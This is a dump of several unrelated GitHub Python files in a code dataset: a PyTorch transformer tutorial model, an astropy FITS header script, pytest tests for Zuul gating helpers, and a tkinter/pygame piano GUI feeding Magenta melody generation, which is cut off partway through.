Block(nn.Module):\n \"\"\" Transformer block: communication followed by computation \"\"\"\n\n def __init__(self, n_embd: int, n_head: int, block_size: int, dropout: float):\n # n_embd: embedding dimension, n_head: the number of heads we'd like\n super().__init__()\n head_size = n_embd // n_head\n self.sa = MultiHeadAttention(num_heads=n_head, head_size=head_size, n_embd=n_embd, block_size=block_size, dropout=dropout)\n self.ffwd = FeedFoward(n_embd=n_embd, dropout=dropout)\n self.ln1 = nn.LayerNorm(n_embd)\n self.ln2 = nn.LayerNorm(n_embd)\n\n def forward(self, x):\n # JEB: This is one of the only that changed compared to the original\n # paper. The normalization is made first in this model.\n x = x + self.sa(self.ln1(x))\n x = x + self.ffwd(self.ln2(x))\n return x\n\n# super simple bigram model\n\n\nclass Transformer8(nn.Module):\n\n def __init__(self, vocab_size: int, n_embd: int, n_layer: int, n_head: int, block_size: int, dropout: float):\n super().__init__()\n # each token directly reads off the logits for the next token from a lookup table\n self.token_embedding_table = nn.Embedding(vocab_size, n_embd)\n self.position_embedding_table = nn.Embedding(block_size, n_embd)\n self.blocks = nn.Sequential(*[Block(n_embd=n_embd, n_head=n_head, block_size=block_size, dropout=dropout) for _ in range(n_layer)])\n self.ln_f = nn.LayerNorm(n_embd) # final layer norm\n self.lm_head = nn.Linear(n_embd, vocab_size)\n self.block_size = block_size\n\n def forward(self, idx, targets=None):\n B, T = idx.shape\n # idx and targets are both (B,T) tensor of integers\n tok_emb = self.token_embedding_table(idx) # (B,T,C)\n pos_emb = self.position_embedding_table(torch.arange(T, device=device)) # (T,C)\n # JEB: Broadcasting. pos_emb gets right-aligned, a new dimension is added\n # and it gets added accross batch.\n x = tok_emb + pos_emb # (B,T,C)\n x = self.blocks(x) # (B,T,C)\n x = self.ln_f(x) # (B,T,C)\n logits = self.lm_head(x) # (B,T,vocab_size)\n\n if targets is None:\n loss = None\n else:\n #JEB: Interesting. This model computes the loss\n #in the forward method.\n B, T, C = logits.shape\n logits = logits.view(B*T, C)\n targets = targets.view(B*T)\n loss = F.cross_entropy(logits, targets)\n\n return logits, loss\n\n def generate(self, idx, max_new_tokens):\n # idx is (B, T) array of indices in the current context\n for _ in range(max_new_tokens):\n # crop idx to the last block_size tokens\n idx_cond = idx[:, -self.block_size:]\n # get the predictions. 
(We invoke forward here with a target)\n logits, loss = self(idx_cond)\n # focus only on the last time step\n logits = logits[:, -1, :] # becomes (B, C)\n # apply softmax to get probabilities\n probs = F.softmax(logits, dim=-1) # (B, C)\n # sample from the distribution\n idx_next = torch.multinomial(probs, num_samples=1) # (B, 1)\n # append sampled index to the running sequence\n idx = torch.cat((idx, idx_next), dim=1) # (B, T+1)\n return idx\n\n\ndef build_transformer8(tgt_vocab_size: int, d_model: int = 64, N: int = 4, h: int = 4, block_size: int = 32, dropout: float = 0.0, d_ff: int = 256) -> Transformer8:\n\n # Create the transformer\n transformer = Transformer8(vocab_size=tgt_vocab_size, n_embd=d_model, n_head=h,\n n_layer=N, block_size=block_size, dropout=dropout)\n\n # When computing the loss, we are ignoring cases when the label is the padding token\n # for params in transformer.parameters():\n # if params.dim() > 1:\n # nn.init.xavier_uniform_(params)\n\n return transformer\n", "repo_name": "prorates/pytorch-transformer-tutorials", "sub_path": "model8.py", "file_name": "model8.py", "file_ext": "py", "file_size_in_byte": 7225, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "config.get_device", "line_number": 10, "usage_type": "call"}, {"api_name": "torch.nn.Module", "line_number": 12, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 12, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 17, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 17, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 18, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 18, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 19, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 19, "usage_type": "name"}, {"api_name": "torch.tril", "line_number": 20, "usage_type": "call"}, {"api_name": "torch.ones", "line_number": 20, "usage_type": "call"}, {"api_name": "torch.nn.Dropout", "line_number": 22, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 22, "usage_type": "name"}, {"api_name": "torch.nn.functional.softmax", "line_number": 41, "usage_type": "call"}, {"api_name": "torch.nn.functional", "line_number": 41, "usage_type": "name"}, {"api_name": "torch.nn.Module", "line_number": 50, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 50, "usage_type": "name"}, {"api_name": "torch.nn.ModuleList", "line_number": 55, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 55, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 56, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 56, "usage_type": "name"}, {"api_name": "torch.nn.Dropout", "line_number": 57, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 57, "usage_type": "name"}, {"api_name": "torch.cat", "line_number": 60, "usage_type": "call"}, {"api_name": "torch.nn.Module", "line_number": 65, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 65, "usage_type": "name"}, {"api_name": "torch.nn.Sequential", "line_number": 70, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 70, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 72, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 72, "usage_type": "name"}, {"api_name": "torch.nn.ReLU", "line_number": 73, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 73, 
"usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 74, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 74, "usage_type": "name"}, {"api_name": "torch.nn.Dropout", "line_number": 75, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 75, "usage_type": "name"}, {"api_name": "torch.nn.Module", "line_number": 82, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 82, "usage_type": "name"}, {"api_name": "torch.nn.LayerNorm", "line_number": 91, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 91, "usage_type": "name"}, {"api_name": "torch.nn.LayerNorm", "line_number": 92, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 92, "usage_type": "name"}, {"api_name": "torch.nn.Module", "line_number": 104, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 104, "usage_type": "name"}, {"api_name": "torch.nn.Embedding", "line_number": 109, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 109, "usage_type": "name"}, {"api_name": "torch.nn.Embedding", "line_number": 110, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 110, "usage_type": "name"}, {"api_name": "torch.nn.Sequential", "line_number": 111, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 111, "usage_type": "name"}, {"api_name": "torch.nn.LayerNorm", "line_number": 112, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 112, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 113, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 113, "usage_type": "name"}, {"api_name": "torch.arange", "line_number": 120, "usage_type": "call"}, {"api_name": "torch.nn.functional.cross_entropy", "line_number": 136, "usage_type": "call"}, {"api_name": "torch.nn.functional", "line_number": 136, "usage_type": "name"}, {"api_name": "torch.nn.functional.softmax", "line_number": 150, "usage_type": "call"}, {"api_name": "torch.nn.functional", "line_number": 150, "usage_type": "name"}, {"api_name": "torch.multinomial", "line_number": 152, "usage_type": "call"}, {"api_name": "torch.cat", "line_number": 154, "usage_type": "call"}]} +{"seq_id": "20725816437", "text": "import numpy as np\nfrom astropy.io import fits\nimport os\nimport matplotlib.pyplot as plt\n\ndir = '/Users/renbin/ASICAP/Apr16/'\nnames = np.empty(268,dtype=(np.unicode_,40))\nimgtypes = np.empty(268,dtype=(np.unicode_,16))\nlens = np.empty(268,dtype=(np.unicode_,10))\nf = open(dir+'list_apr16','r')\nct=0\nfor line in f:\n line = line.strip()\n columns = line.split()\n if len(columns) == 3:\n names[ct] = columns[0]\n imgtypes[ct] = columns[1]\n lens[ct] = columns[2]\n ct = ct+1\nf.close()\n\nnames = names[0:ct]\nimgtypes = imgtypes[0:ct]\nlens = lens[0:ct]\ncombtypes = np.array([x+'_'+y for x,y in zip(imgtypes,lens)])\n\n#uniqtypes = np.unique(imgtypes)\n#uniqlens = np.unique(lens)\nuniqcomb = np.unique(combtypes)\n\nfor type in uniqcomb:\n ind = np.where(combtypes == type)[0]\n print('For ',type, len(ind))\n file=names[ind[-1]]\n hdu=fits.open(dir+file)\n exptime = hdu[0].header['EXPOINUS']\n hdu.close()\n hdu=fits.open(dir+'median_'+type+'.fits')\n hdr = hdu[0].header\n hdr.set('EXPOINUS',exptime)\n hdu[0].header = hdr\n hdu.writeto(dir+'median_'+type+'.fits',overwrite=True)\n hdu.close()\n \n\n", "repo_name": "yanrenbin/amase-dev", "sub_path": "addexptime.py", "file_name": "addexptime.py", "file_ext": "py", "file_size_in_byte": 1161, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": 
"github-code", "pt": "53", "api": [{"api_name": "numpy.empty", "line_number": 7, "usage_type": "call"}, {"api_name": "numpy.unicode_", "line_number": 7, "usage_type": "attribute"}, {"api_name": "numpy.empty", "line_number": 8, "usage_type": "call"}, {"api_name": "numpy.unicode_", "line_number": 8, "usage_type": "attribute"}, {"api_name": "numpy.empty", "line_number": 9, "usage_type": "call"}, {"api_name": "numpy.unicode_", "line_number": 9, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 25, "usage_type": "call"}, {"api_name": "numpy.unique", "line_number": 29, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 32, "usage_type": "call"}, {"api_name": "astropy.io.fits.open", "line_number": 35, "usage_type": "call"}, {"api_name": "astropy.io.fits", "line_number": 35, "usage_type": "name"}, {"api_name": "astropy.io.fits.open", "line_number": 38, "usage_type": "call"}, {"api_name": "astropy.io.fits", "line_number": 38, "usage_type": "name"}]} +{"seq_id": "34903768203", "text": "#!/usr/bin/env python\n# test_zuul_helpers.py - Tests for zuul_helpers.py\n#\nimport pytest\nfrom six import string_types, iteritems\nimport yaml\ntry:\n from unittest.mock import MagicMock\nexcept ImportError:\n from mock import MagicMock\n\nfrom stdci_libs.zuul_helpers import (\n is_gated_project, merge_project_yaml, is_gated_project_entry\n)\nfrom stdci_libs import zuul_helpers\n\n\n@pytest.fixture\ndef projects(gitrepo):\n prj_defs = {\n 'onefile': {\n 'zuul.yaml': [\n {'project': {'name': 'onefile', 'id': 'p1', 'gated': True}},\n ],\n },\n 'onedotfile': {\n '.zuul.yaml': [\n {'project': {'name': 'onedotfile', 'id': 'p1', 'gated': True}},\n ],\n },\n 'unnamed': {\n 'zuul.yaml': [{'project': {'id': 'p1', 'gated': True}}],\n },\n 'dir': {\n 'zuul.d/base-project.yaml': [{'project': {'id': 'p1'}}],\n 'zuul.d/jobs.yaml': [\n {'job': {'name': 'j1'}},\n {'job': {'name': 'j2'}},\n ],\n 'zuul.d/project.yaml': [\n {'project': {'id': 'p2', 'gated': True}},\n {'project': {'name': 'p3', 'id': 'p3'}},\n ],\n },\n 'file+': {\n 'zuul.yaml': [{'project': {'id': 'p1'}}],\n 'zuul.d/a.yaml': [{'project': {'id': 'p2'}}],\n '.zuul.yaml': [{'project': {'id': 'p3'}}],\n '.zuul.d/b.yaml': [{'project': {'id': 'p4'}}],\n },\n 'dir+': {\n 'zuul.d/a.yaml': [{'project': {'id': 'p2'}}],\n '.zuul.yaml': [{'project': {'id': 'p3'}}],\n '.zuul.d/b.yaml': [{'project': {'id': 'p4'}}],\n },\n 'dotfile+': {\n '.zuul.yaml': [{'project': {'id': 'p3'}}],\n '.zuul.d/b.yaml': [{'project': {'id': 'p4'}}],\n },\n 'dotdir+': {\n '.zuul.d/b.yaml': [{'project': {'id': 'p4'}}],\n },\n }\n prj_defs = {\n name: {\n fn:\n fc if isinstance(fc, string_types) else\n yaml.safe_dump(fc, default_flow_style=False)\n for fn, fc in iteritems(content)\n }\n for name, content in iteritems(prj_defs)\n }\n prj_defs = {\n name: gitrepo(name, {'files': content})\n for name, content in iteritems(prj_defs)\n }\n return prj_defs\n\n\n@pytest.mark.parametrize('prj,prj_name,exp_prj,exp_out', [\n ('onefile', None, 'p1', True),\n ('onefile', 'other-project', None, False),\n ('onedotfile', None, 'p1', True),\n ('unnamed', None, 'p1', True),\n ('unnamed', 'foo', 'p1', True),\n ('unnamed', 'bar', 'p1', True),\n ('dir', None, 'p1+p2', True),\n ('dir', 'foo', 'p1+p2', True),\n ('dir', 'p3', 'p1+p2+p3', True),\n ('file+', None, 'p1', False),\n ('dir+', None, 'p2', False),\n ('dotfile+', None, 'p3', False),\n ('dotdir+', None, 'p4', False),\n])\ndef test_is_gated_project(\n monkeypatch, projects, prj, prj_name, exp_prj, exp_out\n):\n\n def 
is_gated_project_entry(entry, *args, **kwargs):\n return entry.get('gated', False)\n is_gated_project_entry = MagicMock(side_effect=is_gated_project_entry)\n\n def merge_project_yaml(entries, *args, **kwargs):\n return {\n 'id': '+'.join(e['id'] for e in entries),\n 'gated': any(e.get('gated', False) for e in entries),\n }\n merge_project_yaml = MagicMock(side_effect=merge_project_yaml)\n\n monkeypatch.setattr(\n zuul_helpers, 'is_gated_project_entry', is_gated_project_entry\n )\n monkeypatch.setattr(\n zuul_helpers, 'merge_project_yaml', merge_project_yaml\n )\n\n out = is_gated_project(projects[prj], prj_name)\n if exp_prj is None:\n assert not is_gated_project_entry.called\n else:\n assert is_gated_project_entry.call_args[0][0]['id'] == exp_prj\n assert out == exp_out\n\n\n@pytest.mark.parametrize('entries,gate_pipelines,expected', [\n (\n ({'name': 'prj'}, {'templates': ['t1', 't2']}),\n '^gt$',\n {'templates': ['t1', 't2']}\n ),\n (\n ({'templates': ['t1', 't2']}, {'templates': ['t3']}),\n '^gt$',\n {'templates': ['t1', 't2', 't3']}\n ),\n (\n ({'gt': {'jobs': ['j1']}}, {'gt': {'jobs': ['j2']}}),\n '^gt$',\n {'gt': {'jobs': ['j1', 'j2']}},\n ),\n (\n ({'gt': {'jobs': ['j1']}}, {'gt': {'jobs': ['j2', 'j1']}}),\n '^gt$',\n {'gt': {'jobs': ['j1', 'j2', 'j1']}},\n ),\n (\n ({'gt1': {'jobs': ['j1']}}, {'gt2': {'jobs': ['j2', 'j1']}}),\n '^gt$',\n {},\n ),\n (\n ({'gt1': {'jobs': ['j1']}}, {'gt2': {'jobs': ['j2', 'j1']}}),\n '^gt.$',\n {'gt1': {'jobs': ['j1']}, 'gt2': {'jobs': ['j2', 'j1']}},\n ),\n (\n (\n {'templates': ['t1', 't2'], 'gt': {'jobs': ['1', '2']}},\n {'templates': ['t3'], 'gt': {'jobs': ['3']}, 'p': {'jobs': ['4']}},\n {'gt': {'jobs': ['5']}, 'p': {'jobs': ['6', '7']}},\n ),\n '^gt$',\n {'templates': ['t1', 't2', 't3'], 'gt': {'jobs': ['1', '2', '3', '5']}}\n )\n\n])\ndef test_merge_project_yaml(entries, gate_pipelines, expected):\n out = merge_project_yaml(entries, gate_pipelines)\n assert out == expected\n\n\n@pytest.mark.parametrize('input,expected', [\n ({\n 'entry': {'templates': ['the-gated-project']},\n }, True),\n ({\n 'entry': {'templates': ['some-template', 'the-gated-project']},\n }, True),\n ({\n 'entry': {'templates': ['some-template', 'the-gated-project']},\n 'gate_templates': '^really-gated$',\n }, False),\n ({\n 'entry': {'gate-patch': {'jobs': ['run-gate-job']}},\n }, True),\n ({\n 'entry': {'gate-patch': {'jobs': [{'run-gate-job': {}}]}},\n }, True),\n ({\n 'entry': {'gate-patch': {'jobs': ['job1', {'job2': {}}]}},\n }, False),\n ({\n 'entry': {'gate-patch': {'jobs': ['run-gate-job']}},\n 'gate_jobs': '2$',\n }, False),\n ({\n 'entry': {'gate-patch': {'jobs': ['run-gate-job']}},\n 'gate_pipelines': '^gate$',\n }, False),\n ({\n 'entry': {'gate-patch': {'jobs': ['job1', {'job2': {}}]}},\n 'gate_jobs': '2$',\n }, True),\n])\ndef test_is_gated_project_entry(input, expected):\n out = is_gated_project_entry(**input)\n assert out == expected\n", "repo_name": "oVirt/jenkins", "sub_path": "test/test_zuul_helpers.py", "file_name": "test_zuul_helpers.py", "file_ext": "py", "file_size_in_byte": 6296, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 16, "dataset": "github-code", "pt": "53", "api": [{"api_name": "six.string_types", "line_number": 67, "usage_type": "argument"}, {"api_name": "yaml.safe_dump", "line_number": 68, "usage_type": "call"}, {"api_name": "six.iteritems", "line_number": 69, "usage_type": "call"}, {"api_name": "six.iteritems", "line_number": 71, "usage_type": "call"}, {"api_name": "six.iteritems", "line_number": 75, "usage_type": 
"call"}, {"api_name": "pytest.fixture", "line_number": 18, "usage_type": "attribute"}, {"api_name": "stdci_libs.zuul_helpers.is_gated_project_entry", "line_number": 101, "usage_type": "name"}, {"api_name": "mock.MagicMock", "line_number": 101, "usage_type": "call"}, {"api_name": "stdci_libs.zuul_helpers.merge_project_yaml", "line_number": 108, "usage_type": "name"}, {"api_name": "mock.MagicMock", "line_number": 108, "usage_type": "call"}, {"api_name": "stdci_libs.zuul_helpers", "line_number": 111, "usage_type": "argument"}, {"api_name": "stdci_libs.zuul_helpers.is_gated_project_entry", "line_number": 111, "usage_type": "argument"}, {"api_name": "stdci_libs.zuul_helpers", "line_number": 114, "usage_type": "argument"}, {"api_name": "stdci_libs.zuul_helpers.merge_project_yaml", "line_number": 114, "usage_type": "argument"}, {"api_name": "stdci_libs.zuul_helpers.is_gated_project", "line_number": 117, "usage_type": "call"}, {"api_name": "stdci_libs.zuul_helpers.is_gated_project_entry.called", "line_number": 119, "usage_type": "attribute"}, {"api_name": "stdci_libs.zuul_helpers.is_gated_project_entry", "line_number": 119, "usage_type": "name"}, {"api_name": "stdci_libs.zuul_helpers.is_gated_project_entry.call_args", "line_number": 121, "usage_type": "attribute"}, {"api_name": "stdci_libs.zuul_helpers.is_gated_project_entry", "line_number": 121, "usage_type": "name"}, {"api_name": "pytest.mark.parametrize", "line_number": 80, "usage_type": "call"}, {"api_name": "pytest.mark", "line_number": 80, "usage_type": "attribute"}, {"api_name": "stdci_libs.zuul_helpers.merge_project_yaml", "line_number": 168, "usage_type": "call"}, {"api_name": "pytest.mark.parametrize", "line_number": 125, "usage_type": "call"}, {"api_name": "pytest.mark", "line_number": 125, "usage_type": "attribute"}, {"api_name": "stdci_libs.zuul_helpers.is_gated_project_entry", "line_number": 206, "usage_type": "call"}, {"api_name": "pytest.mark.parametrize", "line_number": 172, "usage_type": "call"}, {"api_name": "pytest.mark", "line_number": 172, "usage_type": "attribute"}]} +{"seq_id": "16018655424", "text": "from tkinter import *\nimport time\nimport datetime\nimport pygame\nimport tkinter as Tk\nimport threading,time,random\nimport os\nimport psutil\nfrom kill import kill\nfrom magenta.models.melody_rnn import melody_rnn_generate\nimport tensorflow as tf\nfrom magenta.models.melody_rnn.melody_rnn_generate import m_r_g_pitch_list\nfrom magenta.models.melody_rnn.melody_rnn_generate import midi_file\nfrom time import sleep\n\nstart_stop = False # detect press return True: generate False: stop play, stop generate\n\n# pygame.init()\npygame.mixer.init(44100, -16,2,2048)\n\ncount = 0\nlock = threading.Lock()\n\npitch_list = []\nroot = Tk.Tk()\nroot.title(\"Panio GUI\")\n# width,height = 1000,500\n# root.geometry(\"%dx%d+30+30\"%(width,height))\nroot.configure(background = \"white\")\n\nmainframe = Frame(root,bg = \"white\",bd = 20)\nmainframe.grid()\n\n\ntmp_frame1 = Frame(mainframe,bg = \"white\",bd = 20)\ntmp_frame1.grid()\ntmp_frame2 = Frame(mainframe,bg = \"white\",bd = 20)\ntmp_frame2.grid()\ntmp_frame3 = Frame(mainframe,bg = \"white\",bd = 20)\ntmp_frame3.grid()\n\n\nstr1 = StringVar()\nstr1.set(\"Just Like Music\")\nDate1 = StringVar()\nTime1 = StringVar()\n\nDate1.set(time.strftime(\"%d/%m/%Y\"))\nTime1.set(time.strftime(\"%H/%M/%S\"))\n\ndef setblackkey(item):\n item.config(bg=\"black\",fg=\"white\")\n\ndef setwhitekey(item):\n item.config(bg=\"Gainsboro\", fg=\"black\")\n\ndef value_Cs():\n global pitch_list\n 
str1.set(\"C#\")\n sound = pygame.mixer.Sound(\"/Users/yuhaomao/Downloads/Music_Notes/C_s.wav\")\n sound.play()\n pitch_list.append(61)\n btnCs.config(bg=\"Tan\", fg=\"black\")\n root.after(100,setblackkey,btnCs)\n\ndef value_Ds():\n global pitch_list\n str1.set(\"D#\")\n sound = pygame.mixer.Sound(\"/Users/yuhaomao/Downloads/Music_Notes/D_s.wav\")\n sound.play()\n pitch_list.append(63)\n btnDs.config(bg=\"Tan\", fg=\"black\")\n root.after(100, setblackkey, btnDs)\n\ndef value_Fs():\n global pitch_list\n str1.set(\"F#\")\n sound = pygame.mixer.Sound(\"/Users/yuhaomao/Downloads/Music_Notes/F_s.wav\")\n sound.play()\n pitch_list.append(66)\n btnFs.config(bg=\"Tan\", fg=\"black\")\n root.after(100, setblackkey, btnFs)\n\ndef value_Gs():\n global pitch_list\n str1.set(\"G#\")\n sound = pygame.mixer.Sound(\"/Users/yuhaomao/Downloads/Music_Notes/G_s.wav\")\n sound.play()\n pitch_list.append(68)\n btnGs.config(bg=\"Tan\", fg=\"black\")\n root.after(100, setblackkey, btnGs)\n\ndef value_Bb():\n global pitch_list\n str1.set(\"Bb\")\n sound = pygame.mixer.Sound(\"/Users/yuhaomao/Downloads/Music_Notes/Bb.wav\")\n sound.play()\n pitch_list.append(70)\n btnBb.config(bg=\"Tan\", fg=\"black\")\n root.after(100, setblackkey, btnBb)\n\ndef value_Cs1():\n global pitch_list\n str1.set(\"C_s1\")\n sound = pygame.mixer.Sound(\"/Users/yuhaomao/Downloads/Music_Notes/C_s1.wav\")\n sound.play()\n pitch_list.append(73)\n btnCs1.config(bg=\"Tan\", fg=\"black\")\n root.after(100, setblackkey, btnCs1)\n\ndef value_Ds1():\n global pitch_list\n str1.set(\"D_s1\")\n sound = pygame.mixer.Sound(\"/Users/yuhaomao/Downloads/Music_Notes/D_s1.wav\")\n sound.play()\n pitch_list.append(75)\n btnDs1.config(bg=\"Tan\", fg=\"black\")\n root.after(100, setblackkey, btnDs1)\n\ndef value_C():\n global pitch_list\n str1.set(\"C\")\n sound = pygame.mixer.Sound(\"/Users/yuhaomao/Downloads/Music_Notes/C.wav\")\n sound.play()\n pitch_list.append(60)\n btnC.config(bg=\"DimGray\", fg=\"white\")\n root.after(100, setwhitekey, btnC)\n\ndef value_D():\n global pitch_list\n str1.set(\"D\")\n sound = pygame.mixer.Sound(\"/Users/yuhaomao/Downloads/Music_Notes/D.wav\")\n sound.play()\n pitch_list.append(62)\n btnD.config(bg=\"DimGray\", fg=\"white\")\n root.after(100, setwhitekey, btnD)\n\ndef value_E():\n global pitch_list\n str1.set(\"E\")\n sound = pygame.mixer.Sound(\"/Users/yuhaomao/Downloads/Music_Notes/E.wav\")\n sound.play()\n pitch_list.append(64)\n btnE.config(bg=\"DimGray\", fg=\"white\")\n root.after(100, setwhitekey, btnE)\n\ndef value_F():\n global pitch_list\n str1.set(\"F\")\n sound = pygame.mixer.Sound(\"/Users/yuhaomao/Downloads/Music_Notes/F.wav\")\n sound.play()\n pitch_list.append(65)\n btnF.config(bg=\"DimGray\", fg=\"white\")\n root.after(100, setwhitekey, btnF)\n\ndef value_G():\n global pitch_list\n str1.set(\"G\")\n sound = pygame.mixer.Sound(\"/Users/yuhaomao/Downloads/Music_Notes/G.wav\")\n sound.play()\n pitch_list.append(67)\n btnG.config(bg=\"DimGray\", fg=\"white\")\n root.after(100, setwhitekey, btnG)\n\ndef value_A():\n global pitch_list\n str1.set(\"A\")\n sound = pygame.mixer.Sound(\"/Users/yuhaomao/Downloads/Music_Notes/A.wav\")\n sound.play()\n pitch_list.append(69)\n btnA.config(bg=\"DimGray\", fg=\"white\")\n root.after(100, setwhitekey, btnA)\n\ndef value_B():\n global pitch_list\n str1.set(\"B\")\n sound = pygame.mixer.Sound(\"/Users/yuhaomao/Downloads/Music_Notes/B.wav\")\n sound.play()\n pitch_list.append(71)\n btnB.config(bg=\"DimGray\", fg=\"white\")\n root.after(100, setwhitekey, btnB)\n\ndef 
value_C1():\n global pitch_list\n str1.set(\"C1\")\n sound = pygame.mixer.Sound(\"/Users/yuhaomao/Downloads/Music_Notes/C1.wav\")\n sound.play()\n pitch_list.append(72)\n btnC1.config(bg=\"DimGray\", fg=\"white\")\n root.after(100, setwhitekey, btnC1)\n\ndef value_D1():\n global pitch_list\n str1.set(\"D1\")\n sound = pygame.mixer.Sound(\"/Users/yuhaomao/Downloads/Music_Notes/D1.wav\")\n sound.play()\n pitch_list.append(74)\n btnD1.config(bg=\"DimGray\", fg=\"white\")\n root.after(100, setwhitekey, btnD1)\n\ndef value_E1():\n global pitch_list\n str1.set(\"E1\")\n sound = pygame.mixer.Sound(\"/Users/yuhaomao/Downloads/Music_Notes/E1.wav\")\n sound.play()\n pitch_list.append(76)\n btnE1.config(bg=\"DimGray\", fg=\"white\")\n root.after(100, setwhitekey, btnE1)\n\ndef value_F1():\n global pitch_list\n str1.set(\"F1\")\n sound = pygame.mixer.Sound(\"/Users/yuhaomao/Downloads/Music_Notes/F1.wav\")\n sound.play()\n pitch_list.append(77)\n btnF1.config(bg=\"DimGray\", fg=\"white\")\n root.after(100, setwhitekey, btnF1)\n\n\n\n# ==========Lable with Title========= #\n\nLabel(tmp_frame1,text = \"Piano Musical Keys\",font = (\"Impact\",25,\"bold\"), bg = \"white\").grid(row = 0, column = 0, columnspan = 11)\n\n# =================================== text\n\ntxtDate = Entry(tmp_frame1, textvariable = Date1,font = (\"arial\",18,\"bold\"), bg = \"white\").grid(row = 1, column = 0,pady = 1)\n\ntxtDisplay = Entry(tmp_frame1, textvariable = str1,font = (\"arial\",18,\"bold\"), bg = \"white\").grid(row = 1, column = 1,pady = 1)\n\ntxtTime = Entry(tmp_frame1, textvariable = Time1,font = (\"arial\",18,\"bold\"), bg = \"white\").grid(row = 1, column = 2,pady = 1)\n\n#=================================== black key\nspace = Tk.Label(tmp_frame2,height = 6, width = 4,text = \"\",font = (\"arial\",18,\"bold\"), bg = \"white\",fg = \"white\")\nspace.grid(row = 0, column = 0, padx = 5, pady = 5)\n\nbtnCs = Tk.Label(tmp_frame2,height = 6, width = 8,text = \"C#\",font = (\"arial\",18,\"bold\"), bg = \"black\",fg = \"white\")\nbtnCs.grid(row = 0, column = 1, padx = 5, pady = 5)\nbtnCs.bind(\"\",lambda event:value_Cs())\nroot.bind(\"\", lambda event: value_Cs())\n\n\nbtnDs = Tk.Label(tmp_frame2,height = 6, width = 8,text = \"D#\", bg = \"black\",fg = \"white\",font = (\"arial\",18,\"bold\"))\nbtnDs.grid(row = 0, column = 2, padx = 5, pady = 5)\nbtnDs.bind(\"\",lambda event:value_Ds())\nroot.bind(\"\", lambda event: value_Ds())\n\nspace = Tk.Label(tmp_frame2,height = 6, width = 4,text = \"\",font = (\"arial\",18,\"bold\"), bg = \"white\",fg = \"white\")\nspace.grid(row = 0, column = 3, padx = 5, pady = 5)\n\nspace = Tk.Label(tmp_frame2,height = 6, width = 4,text = \"\",font = (\"arial\",18,\"bold\"), bg = \"white\",fg = \"white\")\nspace.grid(row = 0, column = 4, padx = 5, pady = 5)\n\nbtnFs = Tk.Label(tmp_frame2,height = 6, width = 8, text=\"F#\", bg = \"black\",fg=\"white\", font = (\"arial\",18,\"bold\"))\nbtnFs.grid(row = 0, column = 5, padx = 5, pady = 5)\nbtnFs.bind(\"\",lambda event:value_Fs())\nroot.bind(\"\", lambda event: value_Fs())\n\n\nbtnGs = Tk.Label(tmp_frame2,height = 6, width = 8,text = \"G#\",font = (\"arial\",18,\"bold\"), bg = \"black\",fg = \"white\")\nbtnGs.grid(row = 0, column = 6, padx = 5, pady = 5)\nbtnGs.bind(\"\",lambda event:value_Gs())\nroot.bind(\"\", lambda event: value_Gs())\n\n\nbtnBb = Tk.Label(tmp_frame2,height = 6, width = 8,text = \"Bb\",font = (\"arial\",18,\"bold\"), bg = \"black\",fg = \"white\")\nbtnBb.grid(row = 0, column = 7, padx = 5, pady = 5)\nbtnBb.bind(\"\",lambda 
event:value_Bb())\nroot.bind(\"\", lambda event: value_Bb())\n\nspace = Tk.Label(tmp_frame2,height = 6, width = 4,text = \"\",font = (\"arial\",18,\"bold\"), bg = \"white\",fg = \"white\")\nspace.grid(row = 0, column = 8, padx = 5, pady = 5)\n\nspace = Tk.Label(tmp_frame2,height = 6, width = 4,text = \"\",font = (\"arial\",18,\"bold\"), bg = \"white\",fg = \"white\")\nspace.grid(row = 0, column = 9, padx = 5, pady = 5)\n\nbtnCs1 = Tk.Label(tmp_frame2,height = 6, width = 8,text = \"C#1\",font = (\"arial\",18,\"bold\"), bg = \"black\",fg = \"white\")\nbtnCs1.grid(row = 0, column = 10, padx = 5, pady = 5)\nbtnCs1.bind(\"\",lambda event:value_Cs1())\nroot.bind(\"\", lambda event: value_Cs1())\n\n\nbtnDs1 = Tk.Label(tmp_frame2,height = 6, width = 8,text = \"D#1\",font = (\"arial\",18,\"bold\"), bg = \"black\",fg = \"white\")\nbtnDs1.grid(row = 0, column = 11, padx = 5, pady = 5)\nbtnDs1.bind(\"\",lambda event:value_Ds1())\nroot.bind(\"\", lambda event: value_Ds1())\n\nspace = Tk.Label(tmp_frame2,height = 6, width = 4,text = \"\",font = (\"arial\",18,\"bold\"), bg = \"white\",fg = \"white\")\nspace.grid(row = 0, column = 12, padx = 5, pady = 5)\n\nspace = Tk.Label(tmp_frame2,height = 6, width = 4,text = \"\",font = 